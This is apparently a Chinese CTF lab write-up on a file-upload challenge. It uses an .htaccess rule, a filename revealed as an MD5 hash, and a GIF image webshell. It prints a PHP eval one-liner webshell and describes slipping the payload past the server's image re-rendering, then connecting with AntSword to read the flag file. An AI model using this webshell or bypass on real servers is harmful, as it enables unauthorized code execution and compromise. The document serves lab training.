展示靶场内容后看见有.htaccess,.flag.php文件,自然而然想到打开.htaccess文件,.flag.php为最后连接菜刀获得的文件,我们打开.htaccess后看见:
根据.htaccess知识点可知,如果上传该文件为所规定的文件名则会被当作php文件解析。(作者本人才开始打开该文件看见规定的名称时,并没有对此名称有过任何经过二次处理的怀疑,导致即使把图片马改为上述名字,文件保存后还是会存储在新的文件中,文件名更新,且图片马并未被当作php解析,经过同学指导得知改文件名进行过MD5加密,或百度是个好东西,将此加密后的文件名放入百度查询自动辨别MD5加密,解密为test.gif)
制作gif图片马(越小越好)
图片马
为防止被检测到,webshell可为:
<?
@eval($_POST['syy']);
?>
上传图片马,保存为了指定文件名
链接蚁剑发现返回数据为空,下载test.gif,发现php代码被消除==>二次渲染
将上传前后的图片进行对比,将一句话木马插入没有发生改变的地方
没有标黑的地放为没有被二次修改的地方,插入一句话木马(注意修改后文件名称依然要是test.gif,不然图片马不能被当作php解析)(作者在这儿犯了错误)
再次上传成功后链接蚁剑获取falg.php文件